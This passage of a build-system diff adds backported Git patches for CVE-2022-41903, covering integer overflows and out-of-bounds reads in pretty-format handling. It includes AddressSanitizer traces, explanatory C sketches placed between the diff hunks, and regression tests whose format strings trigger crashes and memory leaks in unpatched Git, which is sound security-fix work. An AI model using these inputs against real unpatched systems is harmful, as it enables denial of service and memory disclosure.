+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/81dc898df9b4b4035534a927f3234a3839b698bf]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ pretty.c | 11 ++++++-----
+ t/t4205-log-pretty-formats.sh | 17 +++++++++++++++++
+ 2 files changed, 23 insertions(+), 5 deletions(-)
+
+diff --git a/pretty.c b/pretty.c
+index b32f036..637e344 100644
+--- a/pretty.c
++++ b/pretty.c
+@@ -1427,7 +1427,9 @@ static size_t format_and_pad_commit(struct strbuf *sb, /* in UTF-8 */
+ struct format_commit_context *c)
+ {
+ struct strbuf local_sb = STRBUF_INIT;
+- int total_consumed = 0, len, padding = c->padding;
++ size_t total_consumed = 0;
++ int len, padding = c->padding;
++
+ if (padding < 0) {
+ const char *start = strrchr(sb->buf, '\n');
+ int occupied;
+@@ -1439,7 +1441,7 @@ static size_t format_and_pad_commit(struct strbuf *sb, /* in UTF-8 */
+ }
+ while (1) {
+ int modifier = *placeholder == 'C';
+- int consumed = format_commit_one(&local_sb, placeholder, c);
++ size_t consumed = format_commit_one(&local_sb, placeholder, c);
+ total_consumed += consumed;
+
+ if (!modifier)
+@@ -1505,7 +1507,7 @@ static size_t format_and_pad_commit(struct strbuf *sb, /* in UTF-8 */
+ }
+ strbuf_addbuf(sb, &local_sb);
+ } else {
+- int sb_len = sb->len, offset = 0;
++ size_t sb_len = sb->len, offset = 0;
+ if (c->flush_type == flush_left)
+ offset = padding - len;
+ else if (c->flush_type == flush_both)
+@@ -1528,8 +1530,7 @@ static size_t format_commit_item(struct strbuf *sb, /* in UTF-8 */
+ const char *placeholder,
+ void *context)
+ {
+- int consumed;
+- size_t orig_len;
++ size_t consumed, orig_len;
+ enum {
+ NO_MAGIC,
+ ADD_LF_BEFORE_NON_EMPTY,
+diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
+index f42a69f..a2acee1 100755
+--- a/t/t4205-log-pretty-formats.sh
++++ b/t/t4205-log-pretty-formats.sh
+@@ -788,4 +788,21 @@ test_expect_success '%S in git log --format works with other placeholders (part
+ test_cmp expect actual
+ '
+
++test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message' '
++ # We only assert that this command does not crash. This needs to be
++ # executed with the address sanitizer to demonstrate failure.
++ git log -1 --pretty="format:%>(2147483646)%x41%41%>(2147483646)%x41" >/dev/null
++'
++
++test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'set up huge commit' '
++ test-tool genzeros 2147483649 | tr "\000" "1" >expect &&
++ huge_commit=$(git commit-tree -F expect HEAD^{tree})
++'
++
++test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message' '
++ git log -1 --format="%B%<(1)%x30" $huge_commit >actual &&
++ echo 0 >>expect &&
++ test_cmp expect actual
++'
++
+ test_done
+--
+2.25.1
+
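The patch above works because a string length held in an `int` silently wraps
once the input exceeds INT_MAX. A minimal standalone C sketch of that failure
mode (illustrative only, not code from the Git sources):

    #include <limits.h>
    #include <stdio.h>

    int main(void)
    {
        size_t msg_len = (size_t)INT_MAX + 2;   /* roughly a 2 GiB commit message */

        /* Old behaviour: the length is narrowed to int and wraps negative
         * (implementation-defined, typically -2147483647 on common ABIs). */
        int narrowed = (int)msg_len;

        /* When such a value is later converted back to size_t for memcpy(3),
         * it becomes enormous and the copy runs past the allocation. */
        size_t copy_len = (size_t)narrowed;

        printf("real length     : %zu\n", msg_len);
        printf("narrowed to int : %d\n", narrowed);
        printf("back to size_t  : %zu\n", copy_len);
        return 0;
    }

Keeping the lengths in `size_t` end to end, as the patch does, avoids the
narrowing entirely.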
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-03.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-03.patch
new file mode 100644
index 0000000000..d83d77eaf7
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-03.patch
@@ -0,0 +1,146 @@
+From b49f309aa16febeddb65e82526640a91bbba3be3 Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:46:30 +0100
+Subject: [PATCH 03/12] pretty: fix out-of-bounds read when left-flushing with stealing
+
+With the `%>>(<N>)` pretty formatter, you can ask git-log(1) et al to
+steal spaces. To do so we need to look ahead of the next token to see
+whether there are spaces there. This loop takes into account ANSI
+sequences that end with an `m`, and if it finds any it will skip them
+until it finds the first space. While doing so it does not take into
+account the buffer's limits though and easily does an out-of-bounds
+read.
+
+Add a test that hits this behaviour. While we don't have an easy way to
+verify this, the test causes the following failure when run with
+`SANITIZE=address`:
+
+ ==37941==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000000baf at pc 0x55ba6f88e0d0 bp 0x7ffc84c50d20 sp 0x7ffc84c50d10
+ READ of size 1 at 0x603000000baf thread T0
+ #0 0x55ba6f88e0cf in format_and_pad_commit pretty.c:1712
+ #1 0x55ba6f88e7b4 in format_commit_item pretty.c:1801
+ #2 0x55ba6f9b1ae4 in strbuf_expand strbuf.c:429
+ #3 0x55ba6f88f020 in repo_format_commit_message pretty.c:1869
+ #4 0x55ba6f890ccf in pretty_print_commit pretty.c:2161
+ #5 0x55ba6f7884c8 in show_log log-tree.c:781
+ #6 0x55ba6f78b6ba in log_tree_commit log-tree.c:1117
+ #7 0x55ba6f40fed5 in cmd_log_walk_no_free builtin/log.c:508
+ #8 0x55ba6f41035b in cmd_log_walk builtin/log.c:549
+ #9 0x55ba6f4131a2 in cmd_log builtin/log.c:883
+ #10 0x55ba6f2ea993 in run_builtin git.c:466
+ #11 0x55ba6f2eb397 in handle_builtin git.c:721
+ #12 0x55ba6f2ebb07 in run_argv git.c:788
+ #13 0x55ba6f2ec8a7 in cmd_main git.c:923
+ #14 0x55ba6f581682 in main common-main.c:57
+ #15 0x7f2d08c3c28f (/usr/lib/libc.so.6+0x2328f)
+ #16 0x7f2d08c3c349 in __libc_start_main (/usr/lib/libc.so.6+0x23349)
+ #17 0x55ba6f2e60e4 in _start ../sysdeps/x86_64/start.S:115
+
+ 0x603000000baf is located 1 bytes to the left of 24-byte region [0x603000000bb0,0x603000000bc8)
+ allocated by thread T0 here:
+ #0 0x7f2d08ebe7ea in __interceptor_realloc /usr/src/debug/gcc/libsanitizer/asan/asan_malloc_linux.cpp:85
+ #1 0x55ba6fa5b494 in xrealloc wrapper.c:136
+ #2 0x55ba6f9aefdc in strbuf_grow strbuf.c:99
+ #3 0x55ba6f9b0a06 in strbuf_add strbuf.c:298
+ #4 0x55ba6f9b1a25 in strbuf_expand strbuf.c:418
+ #5 0x55ba6f88f020 in repo_format_commit_message pretty.c:1869
+ #6 0x55ba6f890ccf in pretty_print_commit pretty.c:2161
+ #7 0x55ba6f7884c8 in show_log log-tree.c:781
+ #8 0x55ba6f78b6ba in log_tree_commit log-tree.c:1117
+ #9 0x55ba6f40fed5 in cmd_log_walk_no_free builtin/log.c:508
+ #10 0x55ba6f41035b in cmd_log_walk builtin/log.c:549
+ #11 0x55ba6f4131a2 in cmd_log builtin/log.c:883
+ #12 0x55ba6f2ea993 in run_builtin git.c:466
+ #13 0x55ba6f2eb397 in handle_builtin git.c:721
+ #14 0x55ba6f2ebb07 in run_argv git.c:788
+ #15 0x55ba6f2ec8a7 in cmd_main git.c:923
+ #16 0x55ba6f581682 in main common-main.c:57
+ #17 0x7f2d08c3c28f (/usr/lib/libc.so.6+0x2328f)
+ #18 0x7f2d08c3c349 in __libc_start_main (/usr/lib/libc.so.6+0x23349)
+ #19 0x55ba6f2e60e4 in _start ../sysdeps/x86_64/start.S:115
+
+ SUMMARY: AddressSanitizer: heap-buffer-overflow pretty.c:1712 in format_and_pad_commit
+ Shadow bytes around the buggy address:
+ 0x0c067fff8120: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd
+ 0x0c067fff8130: fd fd fa fa fd fd fd fd fa fa fd fd fd fa fa fa
+ 0x0c067fff8140: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa
+ 0x0c067fff8150: fa fa fd fd fd fd fa fa 00 00 00 fa fa fa fd fd
+ 0x0c067fff8160: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa
+ =>0x0c067fff8170: fd fd fd fa fa[fa]00 00 00 fa fa fa 00 00 00 fa
+ 0x0c067fff8180: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c067fff8190: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c067fff81a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c067fff81b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c067fff81c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ Shadow byte legend (one shadow byte represents 8 application bytes):
+ Addressable: 00
+ Partially addressable: 01 02 03 04 05 06 07
+ Heap left redzone: fa
+ Freed heap region: fd
+ Stack left redzone: f1
+ Stack mid redzone: f2
+ Stack right redzone: f3
+ Stack after return: f5
+ Stack use after scope: f8
+ Global redzone: f9
+ Global init order: f6
+ Poisoned by user: f7
+ Container overflow: fc
+ Array cookie: ac
+ Intra object redzone: bb
+ ASan internal: fe
+ Left alloca redzone: ca
+ Right alloca redzone: cb
+
+Luckily enough, this would only cause us to copy the out-of-bounds data
+into the formatted commit in case we really had an ANSI sequence
+preceding our buffer. So this bug likely has no security consequences.
+
+Fix it regardless by not traversing past the buffer's start.
+
+Reported-by: Patrick Steinhardt <ps@pks.im>
+Reported-by: Eric Sesterhenn <eric.sesterhenn@x41-dsec.de>
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/b49f309aa16febeddb65e82526640a91bbba3be3]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ pretty.c | 2 +-
+ t/t4205-log-pretty-formats.sh | 6 ++++++
+ 2 files changed, 7 insertions(+), 1 deletion(-)
+
+diff --git a/pretty.c b/pretty.c
+index 637e344..4348a82 100644
+--- a/pretty.c
++++ b/pretty.c
+@@ -1468,7 +1468,7 @@ static size_t format_and_pad_commit(struct strbuf *sb, /* in UTF-8 */
+ if (*ch != 'm')
+ break;
+ p = ch - 1;
+- while (ch - p < 10 && *p != '\033')
++ while (p > sb->buf && ch - p < 10 && *p != '\033')
+ p--;
+ if (*p != '\033' ||
+ ch + 1 - p != display_mode_esc_sequence_len(p))
+diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
+index a2acee1..e69caba 100755
+--- a/t/t4205-log-pretty-formats.sh
++++ b/t/t4205-log-pretty-formats.sh
+@@ -788,6 +788,12 @@ test_expect_success '%S in git log --format works with other placeholders (part
+ test_cmp expect actual
+ '
+
++test_expect_success 'log --pretty with space stealing' '
++ printf mm0 >expect &&
++ git log -1 --pretty="format:mm%>>|(1)%x30" >actual &&
++ test_cmp expect actual
++'
++
+ test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message' '
+ # We only assert that this command does not crash. This needs to be
+ # executed with the address sanitizer to demonstrate failure.
+--
+2.25.1
+
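The one-line fix above bounds a backwards scan. A minimal standalone C sketch
of the same idea (the function name and simplifications are illustrative, not
the Git implementation, which also validates the escape sequence length):

    #include <stdio.h>
    #include <string.h>

    /* Look for the ESC that starts an ANSI sequence at most 10 bytes before
     * `ch`; `ch` must point into `buf` past its first byte. */
    static const char *find_esc_start(const char *buf, const char *ch)
    {
        const char *p = ch - 1;

        /* The `p > buf` guard is the essence of the fix: without it the
         * loop can step in front of the buffer. */
        while (p > buf && ch - p < 10 && *p != '\033')
            p--;
        return *p == '\033' ? p : NULL;
    }

    int main(void)
    {
        const char buf[] = "abc\033[31m";
        const char *m = buf + strlen(buf) - 1;    /* the trailing 'm' */
        const char *esc = find_esc_start(buf, m);

        if (esc)
            printf("escape starts at offset %td\n", esc - buf);
        else
            printf("no escape sequence found\n");
        return 0;
    }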
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-04.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-04.patch
new file mode 100644
index 0000000000..9e3c74ff67
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-04.patch
@@ -0,0 +1,150 @@
+From f6e0b9f38987ad5e47bab551f8760b70689a5905 Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:46:34 +0100
+Subject: [PATCH 04/12] pretty: fix out-of-bounds read when parsing invalid padding format
+
+An out-of-bounds read can be triggered when parsing an incomplete
+padding format string passed via `--pretty=format` or in Git archives
+when files are marked with the `export-subst` gitattribute.
+
+This bug exists since we have introduced support for truncating output
+via the `trunc` keyword a7f01c6 (pretty: support truncating in %>, %<
+and %><, 2013-04-19). Before this commit, we used to find the end of the
+formatting string by using strchr(3P). This function returns a `NULL`
+pointer in case the character in question wasn't found. The subsequent
+check whether any character was found thus simply checked the returned
+pointer. After the commit we switched to strcspn(3P) though, which only
+returns the offset to the first found character or to the trailing NUL
+byte. As the end pointer is now computed by adding the offset to the
+start pointer it won't be `NULL` anymore, and as a consequence the check
+doesn't do anything anymore.
+
+The out-of-bounds data that is being read can in fact end up in the
+formatted string. As a consequence, it is possible to leak memory
+contents either by calling git-log(1) or via git-archive(1) when any of
+the archived files is marked with the `export-subst` gitattribute.
+
+ ==10888==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000398 at pc 0x7f0356047cb2 bp 0x7fff3ffb95d0 sp 0x7fff3ffb8d78
+ READ of size 1 at 0x602000000398 thread T0
+ #0 0x7f0356047cb1 in __interceptor_strchrnul /usr/src/debug/gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:725
+ #1 0x563b7cec9a43 in strbuf_expand strbuf.c:417
+ #2 0x563b7cda7060 in repo_format_commit_message pretty.c:1869
+ #3 0x563b7cda8d0f in pretty_print_commit pretty.c:2161
+ #4 0x563b7cca04c8 in show_log log-tree.c:781
+ #5 0x563b7cca36ba in log_tree_commit log-tree.c:1117
+ #6 0x563b7c927ed5 in cmd_log_walk_no_free builtin/log.c:508
+ #7 0x563b7c92835b in cmd_log_walk builtin/log.c:549
+ #8 0x563b7c92b1a2 in cmd_log builtin/log.c:883
+ #9 0x563b7c802993 in run_builtin git.c:466
+ #10 0x563b7c803397 in handle_builtin git.c:721
+ #11 0x563b7c803b07 in run_argv git.c:788
+ #12 0x563b7c8048a7 in cmd_main git.c:923
+ #13 0x563b7ca99682 in main common-main.c:57
+ #14 0x7f0355e3c28f (/usr/lib/libc.so.6+0x2328f)
+ #15 0x7f0355e3c349 in __libc_start_main (/usr/lib/libc.so.6+0x23349)
+ #16 0x563b7c7fe0e4 in _start ../sysdeps/x86_64/start.S:115
+
+ 0x602000000398 is located 0 bytes to the right of 8-byte region [0x602000000390,0x602000000398)
+ allocated by thread T0 here:
+ #0 0x7f0356072faa in __interceptor_strdup /usr/src/debug/gcc/libsanitizer/asan/asan_interceptors.cpp:439
+ #1 0x563b7cf7317c in xstrdup wrapper.c:39
+ #2 0x563b7cd9a06a in save_user_format pretty.c:40
+ #3 0x563b7cd9b3e5 in get_commit_format pretty.c:173
+ #4 0x563b7ce54ea0 in handle_revision_opt revision.c:2456
+ #5 0x563b7ce597c9 in setup_revisions revision.c:2850
+ #6 0x563b7c9269e0 in cmd_log_init_finish builtin/log.c:269
+ #7 0x563b7c927362 in cmd_log_init builtin/log.c:348
+ #8 0x563b7c92b193 in cmd_log builtin/log.c:882
+ #9 0x563b7c802993 in run_builtin git.c:466
+ #10 0x563b7c803397 in handle_builtin git.c:721
+ #11 0x563b7c803b07 in run_argv git.c:788
+ #12 0x563b7c8048a7 in cmd_main git.c:923
+ #13 0x563b7ca99682 in main common-main.c:57
+ #14 0x7f0355e3c28f (/usr/lib/libc.so.6+0x2328f)
+ #15 0x7f0355e3c349 in __libc_start_main (/usr/lib/libc.so.6+0x23349)
+ #16 0x563b7c7fe0e4 in _start ../sysdeps/x86_64/start.S:115
+
+ SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/src/debug/gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:725 in __interceptor_strchrnul
+ Shadow bytes around the buggy address:
+ 0x0c047fff8020: fa fa fd fd fa fa 00 06 fa fa 05 fa fa fa fd fd
+ 0x0c047fff8030: fa fa 00 02 fa fa 06 fa fa fa 05 fa fa fa fd fd
+ 0x0c047fff8040: fa fa 00 07 fa fa 03 fa fa fa fd fd fa fa 00 00
+ 0x0c047fff8050: fa fa 00 01 fa fa fd fd fa fa 00 00 fa fa 00 01
+ 0x0c047fff8060: fa fa 00 06 fa fa 00 06 fa fa 05 fa fa fa 05 fa
+ =>0x0c047fff8070: fa fa 00[fa]fa fa fd fa fa fa fd fd fa fa fd fd
+ 0x0c047fff8080: fa fa fd fd fa fa 00 00 fa fa 00 fa fa fa fd fa
+ 0x0c047fff8090: fa fa fd fd fa fa 00 00 fa fa fa fa fa fa fa fa
+ 0x0c047fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c047fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c047fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ Shadow byte legend (one shadow byte represents 8 application bytes):
+ Addressable: 00
+ Partially addressable: 01 02 03 04 05 06 07
+ Heap left redzone: fa
+ Freed heap region: fd
+ Stack left redzone: f1
+ Stack mid redzone: f2
+ Stack right redzone: f3
+ Stack after return: f5
+ Stack use after scope: f8
+ Global redzone: f9
+ Global init order: f6
+ Poisoned by user: f7
+ Container overflow: fc
+ Array cookie: ac
+ Intra object redzone: bb
+ ASan internal: fe
+ Left alloca redzone: ca
+ Right alloca redzone: cb
+ ==10888==ABORTING
+
+Fix this bug by checking whether `end` points at the trailing NUL byte.
+Add a test which catches this out-of-bounds read and which demonstrates
+that we used to write out-of-bounds data into the formatted message.
+
+Reported-by: Markus Vervier <markus.vervier@x41-dsec.de>
+Original-patch-by: Markus Vervier <markus.vervier@x41-dsec.de>
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/f6e0b9f38987ad5e47bab551f8760b70689a5905]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ pretty.c | 2 +-
+ t/t4205-log-pretty-formats.sh | 6 ++++++
+ 2 files changed, 7 insertions(+), 1 deletion(-)
+
+diff --git a/pretty.c b/pretty.c
+index 4348a82..c49e818 100644
+--- a/pretty.c
++++ b/pretty.c
+@@ -1024,7 +1024,7 @@ static size_t parse_padding_placeholder(const char *placeholder,
+ const char *end = start + strcspn(start, ",)");
+ char *next;
+ int width;
+- if (!end || end == start)
++ if (!*end || end == start)
+ return 0;
+ width = strtol(start, &next, 10);
+ if (next == start || width == 0)
+diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
+index e69caba..8a349df 100755
+--- a/t/t4205-log-pretty-formats.sh
++++ b/t/t4205-log-pretty-formats.sh
+@@ -794,6 +794,12 @@ test_expect_success 'log --pretty with space stealing' '
+ test_cmp expect actual
+ '
+
++test_expect_success 'log --pretty with invalid padding format' '
++ printf "%s%%<(20" "$(git rev-parse HEAD)" >expect &&
++ git log -1 --pretty="format:%H%<(20" >actual &&
++ test_cmp expect actual
++'
++
+ test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message' '
+ # We only assert that this command does not crash. This needs to be
+ # executed with the address sanitizer to demonstrate failure.
+--
+2.25.1
+
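The core of the fix above is the difference between strchr(3) and strcspn(3):
the former can report "not found" via a NULL pointer, the latter never can. A
small standalone C sketch of the pitfall (illustrative only):

    #include <stdio.h>
    #include <string.h>

    int main(void)
    {
        const char *placeholder = "<(20";   /* unterminated padding specifier */

        const char *by_strchr = strchr(placeholder, ')');            /* NULL */
        const char *end = placeholder + strcspn(placeholder, ",)");  /* -> the NUL byte */

        printf("strchr : %s\n", by_strchr ? "found" : "NULL");
        printf("strcspn: offset %zu, stopped at NUL? %s\n",
               strcspn(placeholder, ",)"), *end ? "no" : "yes");

        /* Hence the patched check inspects the character, not the pointer: */
        if (!*end)
            printf("reject: specifier is not terminated\n");
        return 0;
    }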
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-05.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-05.patch
new file mode 100644
index 0000000000..994f7a55b1
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-05.patch
@@ -0,0 +1,98 @@
+From 1de69c0cdd388b0a5b7bdde0bfa0bda514a354b0 Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:46:39 +0100
+Subject: [PATCH 05/12] pretty: fix adding linefeed when placeholder is not expanded
+
+When a formatting directive has a `+` or ` ` after the `%`, then we add
+either a line feed or space if the placeholder expands to a non-empty
+string. In specific cases though this logic doesn't work as expected,
+and we try to add the character even in the case where the formatting
+directive is empty.
+
+One such pattern is `%w(1)%+d%+w(2)`. `%+d` expands to reference names
+pointing to a certain commit, like in `git log --decorate`. For a tagged
+commit this would for example expand to `\n (tag: v1.0.0)`, which has a
+leading newline due to the `+` modifier and a space added by `%d`. Now
+the second wrapping directive will cause us to rewrap the text to
+`\n(tag:\nv1.0.0)`, which is one byte shorter due to the missing leading
+space. The code that handles the `+` magic now notices that the length
+has changed and will thus try to insert a leading line feed at the
+original position. But as the string was shortened, the original
+position is past the buffer's boundary and thus we die with an error.
+
+Now there are two issues here:
+
+ 1. We check whether the buffer length has changed, not whether it
+ has been extended. This causes us to try and add the character
+ past the string boundary.
+
+ 2. The current logic does not make any sense whatsoever. When the
+ string got expanded due to the rewrap, putting the separator into
+ the original position is likely to put it somewhere into the
+ middle of the rewrapped contents.
+
+It is debatable whether `%+w()` makes any sense in the first place.
+Strictly speaking, the placeholder never expands to a non-empty string,
+and consequentially we shouldn't ever accept this combination. We thus
+fix the bug by simply refusing `%+w()`.
+
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/1de69c0cdd388b0a5b7bdde0bfa0bda514a354b0]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ pretty.c | 14 +++++++++++++-
+ t/t4205-log-pretty-formats.sh | 8 ++++++++
+ 2 files changed, 21 insertions(+), 1 deletion(-)
+
+diff --git a/pretty.c b/pretty.c
+index c49e818..195d005 100644
+--- a/pretty.c
++++ b/pretty.c
+@@ -1551,9 +1551,21 @@ static size_t format_commit_item(struct strbuf *sb, /* in UTF-8 */
+ default:
+ break;
+ }
+- if (magic != NO_MAGIC)
++ if (magic != NO_MAGIC) {
+ placeholder++;
+
++ switch (placeholder[0]) {
++ case 'w':
++ /*
++ * `%+w()` cannot ever expand to a non-empty string,
++ * and it potentially changes the layout of preceding
++ * contents. We're thus not able to handle the magic in
++ * this combination and refuse the pattern.
++ */
++ return 0;
++ };
++ }
++
+ orig_len = sb->len;
+ if (((struct format_commit_context *)context)->flush_type != no_flush)
+ consumed = format_and_pad_commit(sb, placeholder, context);
+diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
+index 8a349df..fa1bc2b 100755
+--- a/t/t4205-log-pretty-formats.sh
++++ b/t/t4205-log-pretty-formats.sh
+@@ -800,6 +800,14 @@ test_expect_success 'log --pretty with invalid padding format' '
+ test_cmp expect actual
+ '
+
++test_expect_success 'log --pretty with magical wrapping directives' '
++ commit_id=$(git commit-tree HEAD^{tree} -m "describe me") &&
++ git tag describe-me $commit_id &&
++ printf "\n(tag:\ndescribe-me)%%+w(2)" >expect &&
++ git log -1 --pretty="format:%w(1)%+d%+w(2)" $commit_id >actual &&
++ test_cmp expect actual
++'
++
+ test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message' '
+ # We only assert that this command does not crash. This needs to be
+ # executed with the address sanitizer to demonstrate failure.
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-06.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-06.patch
new file mode 100644
index 0000000000..93fbe5c7fe
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-06.patch
@@ -0,0 +1,90 @@
+From 48050c42c73c28b0c001d63d11dffac7e116847b Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:46:49 +0100
+Subject: [PATCH 06/12] pretty: fix integer overflow in wrapping format
+
+The `%w(width,indent1,indent2)` formatting directive can be used to
+rewrap text to a specific width and is designed after git-shortlog(1)'s
+`-w` parameter. While the three parameters are all stored as `size_t`
+internally, `strbuf_add_wrapped_text()` accepts integers as input. As a
+result, the casted integers may overflow. As these now-negative integers
+are later on passed to `strbuf_addchars()`, we will ultimately run into
+implementation-defined behaviour due to casting a negative number back
+to `size_t` again. On my platform, this results in trying to allocate
+9000 petabyte of memory.
+
+Fix this overflow by using `cast_size_t_to_int()` so that we reject
+inputs that cannot be represented as an integer.
+
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/48050c42c73c28b0c001d63d11dffac7e116847b]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ git-compat-util.h | 8 ++++++++
+ pretty.c | 4 +++-
+ t/t4205-log-pretty-formats.sh | 12 ++++++++++++
+ 3 files changed, 23 insertions(+), 1 deletion(-)
+
+diff --git a/git-compat-util.h b/git-compat-util.h
+index a1ecfd3..b0f3890 100644
+--- a/git-compat-util.h
++++ b/git-compat-util.h
+@@ -854,6 +854,14 @@ static inline size_t st_sub(size_t a, size_t b)
+ return a - b;
+ }
+
++static inline int cast_size_t_to_int(size_t a)
++{
++ if (a > INT_MAX)
++ die("number too large to represent as int on this platform: %"PRIuMAX,
++ (uintmax_t)a);
++ return (int)a;
++}
++
+ #ifdef HAVE_ALLOCA_H
+ # include <alloca.h>
+ # define xalloca(size) (alloca(size))
+diff --git a/pretty.c b/pretty.c
+index 195d005..ff9fc97 100644
+--- a/pretty.c
++++ b/pretty.c
+@@ -898,7 +898,9 @@ static void strbuf_wrap(struct strbuf *sb, size_t pos,
+ if (pos)
+ strbuf_add(&tmp, sb->buf, pos);
+ strbuf_add_wrapped_text(&tmp, sb->buf + pos,
+- (int) indent1, (int) indent2, (int) width);
++ cast_size_t_to_int(indent1),
++ cast_size_t_to_int(indent2),
++ cast_size_t_to_int(width));
+ strbuf_swap(&tmp, sb);
+ strbuf_release(&tmp);
+ }
+diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
+index fa1bc2b..23ac508 100755
+--- a/t/t4205-log-pretty-formats.sh
++++ b/t/t4205-log-pretty-formats.sh
+@@ -808,6 +808,18 @@ test_expect_success 'log --pretty with magical wrapping directives' '
+ test_cmp expect actual
+ '
+
++test_expect_success SIZE_T_IS_64BIT 'log --pretty with overflowing wrapping directive' '
++ cat >expect <<-EOF &&
++ fatal: number too large to represent as int on this platform: 2147483649
++ EOF
++ test_must_fail git log -1 --pretty="format:%w(2147483649,1,1)%d" 2>error &&
++ test_cmp expect error &&
++ test_must_fail git log -1 --pretty="format:%w(1,2147483649,1)%d" 2>error &&
++ test_cmp expect error &&
++ test_must_fail git log -1 --pretty="format:%w(1,1,2147483649)%d" 2>error &&
++ test_cmp expect error
++'
++
+ test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message' '
+ # We only assert that this command does not crash. This needs to be
+ # executed with the address sanitizer to demonstrate failure.
+--
+2.25.1
+
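The `cast_size_t_to_int()` helper added above implements a checked narrowing:
rather than letting a `size_t` wrap when squeezed into an `int`, it dies. A
standalone sketch of the same idiom (the helper name here is made up for the
example):

    #include <limits.h>
    #include <stdint.h>
    #include <stdio.h>
    #include <stdlib.h>

    static int checked_size_to_int(size_t a)
    {
        if (a > INT_MAX) {
            fprintf(stderr,
                    "number too large to represent as int: %ju\n",
                    (uintmax_t)a);
            exit(128);
        }
        return (int)a;
    }

    int main(void)
    {
        printf("%d\n", checked_size_to_int(42));                  /* prints 42 */
        printf("%d\n", checked_size_to_int((size_t)INT_MAX + 1)); /* exits with an error */
        return 0;
    }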
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-07.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-07.patch
new file mode 100644
index 0000000000..ec248ad6c2
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-07.patch
@@ -0,0 +1,123 @@
+From 522cc87fdc25449222a5894a428eebf4b8d5eaa9 Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:46:53 +0100
+Subject: [PATCH 07/12] utf8: fix truncated string lengths in utf8_strnwidth()
+
+The `utf8_strnwidth()` function accepts an optional string length as
+input parameter. This parameter can either be set to `-1`, in which case
+we call `strlen()` on the input. Or it can be set to a positive integer
+that indicates a precomputed length, which callers typically compute by
+calling `strlen()` at some point themselves.
+
